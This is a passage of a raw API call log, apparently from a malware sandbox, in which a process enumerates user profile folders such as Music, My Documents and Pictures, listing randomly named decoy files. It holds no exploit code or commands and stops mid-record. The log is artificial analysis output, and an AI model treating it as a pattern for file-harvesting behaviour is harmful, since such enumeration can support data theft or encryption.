cFileName="..", cAlternateFileName="")) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0142.993] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0142.993] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.993] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.993] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0142.993] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.993] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.993] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.993] PathFindFileNameW (pszPath="") returned="" [0142.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.994] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0142.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.994] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.994] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.994] PathFindFileNameW (pszPath="") returned="" [0142.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfc37200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfc37200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfc37200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfc37200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d42fde0, ftCreationTime.dwHighDateTime=0x1d5e15e, ftLastAccessTime.dwLowDateTime=0xb64b8bc0, ftLastAccessTime.dwHighDateTime=0x1d5dffa, ftLastWriteTime.dwLowDateTime=0xb64b8bc0, ftLastWriteTime.dwHighDateTime=0x1d5dffa, nFileSizeHigh=0x0, nFileSizeLow=0x87a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AoF_.mp3", cAlternateFileName="")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb4fcaa0, ftCreationTime.dwHighDateTime=0x1d5e81a, ftLastAccessTime.dwLowDateTime=0x5c1d9140, ftLastAccessTime.dwHighDateTime=0x1d5df35, ftLastWriteTime.dwLowDateTime=0x5c1d9140, ftLastWriteTime.dwHighDateTime=0x1d5df35, nFileSizeHigh=0x0, nFileSizeLow=0x9d4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eHdrbGQR4C.m4a", cAlternateFileName="EHDRBG~1.M4A")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a33f10, ftCreationTime.dwHighDateTime=0x1d5e4a7, ftLastAccessTime.dwLowDateTime=0x1c466b60, ftLastAccessTime.dwHighDateTime=0x1d5da7a, ftLastWriteTime.dwLowDateTime=0x1c466b60, ftLastWriteTime.dwHighDateTime=0x1d5da7a, nFileSizeHigh=0x0, nFileSizeLow=0x17afc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fChcMe4ESsa4EZHO9.mp3", cAlternateFileName="FCHCME~1.MP3")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b0fa3e0, ftCreationTime.dwHighDateTime=0x1d5dd85, ftLastAccessTime.dwLowDateTime=0x4a3f8b60, ftLastAccessTime.dwHighDateTime=0x1d5e1e0, ftLastWriteTime.dwLowDateTime=0x4a3f8b60, ftLastWriteTime.dwHighDateTime=0x1d5e1e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hj7NwShkhm0XSrV-KW7t", cAlternateFileName="HJ7NWS~1")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75147770, ftCreationTime.dwHighDateTime=0x1d5e4a5, ftLastAccessTime.dwLowDateTime=0x39fb7450, ftLastAccessTime.dwHighDateTime=0x1d5e6d9, ftLastWriteTime.dwLowDateTime=0x39fb7450, ftLastWriteTime.dwHighDateTime=0x1d5e6d9, nFileSizeHigh=0x0, nFileSizeLow=0x12de0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n-Cwau8M-BbfEIUW.wav", cAlternateFileName="N-CWAU~1.WAV")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7887cb80, ftCreationTime.dwHighDateTime=0x1d5dcbe, ftLastAccessTime.dwLowDateTime=0x9daa1610, ftLastAccessTime.dwHighDateTime=0x1d5dbde, ftLastWriteTime.dwLowDateTime=0x9daa1610, ftLastWriteTime.dwHighDateTime=0x1d5dbde, nFileSizeHigh=0x0, nFileSizeLow=0x13ecb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pS1DFZqWrTh5LBu.m4a", cAlternateFileName="PS1DFZ~1.M4A")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd6e230, ftCreationTime.dwHighDateTime=0x1d5e149, ftLastAccessTime.dwLowDateTime=0x3b3b9420, ftLastAccessTime.dwHighDateTime=0x1d5e5d6, ftLastWriteTime.dwLowDateTime=0x3b3b9420, ftLastWriteTime.dwHighDateTime=0x1d5e5d6, nFileSizeHigh=0x0, nFileSizeLow=0x5456, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SaWN3jb c4HxXarO4.wav", cAlternateFileName="SAWN3J~1.WAV")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae260c30, ftCreationTime.dwHighDateTime=0x1d5e7df, ftLastAccessTime.dwLowDateTime=0x264b3170, ftLastAccessTime.dwHighDateTime=0x1d5dc89, ftLastWriteTime.dwLowDateTime=0x264b3170, ftLastWriteTime.dwHighDateTime=0x1d5dc89, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sen2E", cAlternateFileName="")) returned 1 [0142.994] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7dcae10, ftCreationTime.dwHighDateTime=0x1d5e0a6, ftLastAccessTime.dwLowDateTime=0xea940190, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0xea940190, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x38ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqX5xIf.m4a", cAlternateFileName="")) returned 1 [0142.995] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7dcae10, ftCreationTime.dwHighDateTime=0x1d5e0a6, ftLastAccessTime.dwLowDateTime=0xea940190, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0xea940190, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x38ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqX5xIf.m4a", cAlternateFileName="")) returned 0 [0142.995] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.995] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.995] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0142.995] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.995] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.995] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.995] PathFindFileNameW (pszPath="") returned="" [0142.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7dcae10, ftCreationTime.dwHighDateTime=0x1d5e0a6, ftLastAccessTime.dwLowDateTime=0xea940190, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0xea940190, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x38ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqX5xIf.m4a", cAlternateFileName="")) returned 0xffffffff [0142.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.996] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0142.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.996] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.996] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.996] PathFindFileNameW (pszPath="") returned="" [0142.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7dcae10, ftCreationTime.dwHighDateTime=0x1d5e0a6, ftLastAccessTime.dwLowDateTime=0xea940190, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0xea940190, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x38ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SqX5xIf.m4a", cAlternateFileName="")) returned 0xffffffff [0142.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.996] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0142.997] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.997] PathFindFileNameW (pszPath="") returned="" [0142.997] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdff56ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdff56ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b700 | out: hHeap=0x620000) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdff56ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdff56ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0f9430, ftCreationTime.dwHighDateTime=0x1d5df99, ftLastAccessTime.dwLowDateTime=0x1f216b30, ftLastAccessTime.dwHighDateTime=0x1d5e517, ftLastWriteTime.dwLowDateTime=0x1f216b30, ftLastWriteTime.dwHighDateTime=0x1d5e517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-r6wNQZbO24NoicX", cAlternateFileName="-R6WNQ~1")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa03d7ed0, ftCreationTime.dwHighDateTime=0x1d5ded6, ftLastAccessTime.dwLowDateTime=0x2613bcb0, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0x2613bcb0, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0x11118, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1huSzUAcDNUdihxK.gif", cAlternateFileName="1HUSZU~1.GIF")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc165c690, ftCreationTime.dwHighDateTime=0x1d5dff2, ftLastAccessTime.dwLowDateTime=0xac9d60, ftLastAccessTime.dwHighDateTime=0x1d5de9a, ftLastWriteTime.dwLowDateTime=0xac9d60, ftLastWriteTime.dwHighDateTime=0x1d5de9a, nFileSizeHigh=0x0, nFileSizeLow=0x56cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1R xb_l8ZMbaPF.gif", cAlternateFileName="1RXB_L~1.GIF")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf660410, ftCreationTime.dwHighDateTime=0x1d5db9b, ftLastAccessTime.dwLowDateTime=0x93da3130, ftLastAccessTime.dwHighDateTime=0x1d5e31b, ftLastWriteTime.dwLowDateTime=0x93da3130, ftLastWriteTime.dwHighDateTime=0x1d5e31b, nFileSizeHigh=0x0, nFileSizeLow=0xdd84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="68IO7iRcvZFFPOr6cR.bmp", cAlternateFileName="68IO7I~1.BMP")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32761cc0, ftCreationTime.dwHighDateTime=0x1d5dea1, ftLastAccessTime.dwLowDateTime=0xcdee66b0, ftLastAccessTime.dwHighDateTime=0x1d5def3, ftLastWriteTime.dwLowDateTime=0xcdee66b0, ftLastWriteTime.dwHighDateTime=0x1d5def3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6wA8Gw gcJLL8", cAlternateFileName="6WA8GW~1")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a7df0d0, ftCreationTime.dwHighDateTime=0x1d5dcf9, ftLastAccessTime.dwLowDateTime=0x17f85810, ftLastAccessTime.dwHighDateTime=0x1d5e6dd, ftLastWriteTime.dwLowDateTime=0x17f85810, ftLastWriteTime.dwHighDateTime=0x1d5e6dd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="79QGps82F52", cAlternateFileName="79QGPS~1")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd50a6300, ftCreationTime.dwHighDateTime=0x1d5dfb5, ftLastAccessTime.dwLowDateTime=0x546e6ef0, ftLastAccessTime.dwHighDateTime=0x1d5e5c1, ftLastWriteTime.dwLowDateTime=0x546e6ef0, ftLastWriteTime.dwHighDateTime=0x1d5e5c1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CogVc_goc.jpg", cAlternateFileName="COGVC_~1.JPG")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1519fc50, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xa6530b20, ftLastAccessTime.dwHighDateTime=0x1d5e31b, ftLastWriteTime.dwLowDateTime=0xa6530b20, ftLastWriteTime.dwHighDateTime=0x1d5e31b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qcnePkOjcCi6", cAlternateFileName="QCNEPK~1")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98847ff0, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0xc5196520, ftLastAccessTime.dwHighDateTime=0x1d5e3d6, ftLastWriteTime.dwLowDateTime=0xc5196520, ftLastWriteTime.dwHighDateTime=0x1d5e3d6, nFileSizeHigh=0x0, nFileSizeLow=0x12f96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T2gw6HI32atRpzttQ.gif", cAlternateFileName="T2GW6H~1.GIF")) returned 1 [0142.997] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82db740, ftCreationTime.dwHighDateTime=0x1d5d896, ftLastAccessTime.dwLowDateTime=0xaf5aa680, ftLastAccessTime.dwHighDateTime=0x1d5e7dd, ftLastWriteTime.dwLowDateTime=0xaf5aa680, ftLastWriteTime.dwHighDateTime=0x1d5e7dd, nFileSizeHigh=0x0, nFileSizeLow=0x15578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yds3VqHRMaQOn.jpg", cAlternateFileName="YDS3VQ~1.JPG")) returned 1 [0142.998] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59382570, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0x7e0b5f40, ftLastAccessTime.dwHighDateTime=0x1d5dfca, ftLastWriteTime.dwLowDateTime=0x7e0b5f40, ftLastWriteTime.dwHighDateTime=0x1d5dfca, nFileSizeHigh=0x0, nFileSizeLow=0x30ae, dwReserved0=0xa0000003, dwReserved1=0x0, 